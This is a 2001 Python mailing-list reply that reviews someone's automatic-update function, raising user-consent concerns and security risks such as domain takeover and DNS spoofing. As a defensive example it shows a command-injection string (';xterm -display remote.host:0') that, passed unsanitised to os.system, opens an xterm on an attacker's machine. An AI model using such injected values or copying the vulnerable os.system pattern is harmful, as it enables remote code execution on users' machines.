Checking for new version of a program

Andrew Dalke dalke at dalkescientific.com
Mon Aug 20 20:29:26 EDT 2001 

Andrei Kulakov wrote:
>I made a little function that checks for a new version of a program and if
>there is a new version, asks the user if he wants it downloaded. Are there
>any gotchas here?

There are a few things to worry about, some technical and some social.

The social first.  There are people who don't like their software
going out into the world without their permission.  Sometimes it's
because they don't like others knowing when their using code, or
that it implements a license check, or worry that it's being
used to transmit more than an update check, or just plain paranoia.

Sometimes it's for more practical reasons, like being on a dial-up-
on-demand line where the modem might kick in to connect.  And
that whole process could take a minute or more.  Trust me on this :(

You've got a way to disable it.  It's got a way to be disabled.
I aske that you make it clear in the README, INSTALL and documentation
that this exists and can be turned off.

Now for the more technical issues.  I'm not sure enough about urllib
and its interaction with proxies, so I won't answer your most
direct inquiry.  What I can say is that programs like this are
fraught with security problems.  Here's a few concerns I have:

  - how stable is your site?  If it goes down, the call to get
changes_url will fail and raise an exception.

  - will you trust whoever might have the domain after you?
After all, if people your code when that happens then there's
a way for others to sneak in arbitrary code onto the client
machine.

  - I understand there are ways to spoof DNS

>            cy_fname = "cymbaline-%s.tar.gz" % __version__
>            cy_url = base_url + cy_fname
>            cy = urllib.urlopen(cy_url).read()
>            fname = os.path.expanduser("~/" + cy_fname)
>            f = open(fname, 'w')
>            f.write(cy)
>            f.close()

Suppose someone hacked your server.  It's good that you
enforce that the file begins with "cymbaline-" and ends with
".tar.gz" so it's almost impossible to overwrite some other
file, like .login.

However, you then do

>            os.system("tar zxvf %s " % fname)

This assumes GNU tar, since 'z' isn't a standard option.
More worrisome, fname contains an arbitrary string sent by
the server.  With the hacker-attacked-your-server scenario,
suppose the version string was changed to
  ;xterm -display remote.host:0"
Then the code would be downloaded to
    "~/cymbaline;xterm -display remote.host:0.tar.gz"
which is a perfectly valid file name.  But then
  os.system("tar zxvf "~/cymbaline;xterm -display remote.host:0.tar.gz")
gets called, which opens an xterm on the attacker's designated machine.
And of course it could do anything else it wanted besides running xterm.


>Comments appreciated,

Code that does automatic updating is very tricky.  There are too
many potential security holes in it.  The only way I've seen
it done that seems safe is with some sort of crypto signatures,
but even that has its own problems.  (Eg, is the secret key on the
machine accessible to the world?)

                    Andrew
                    dalke at dalkescientific.com

More information about the Python-list mailing list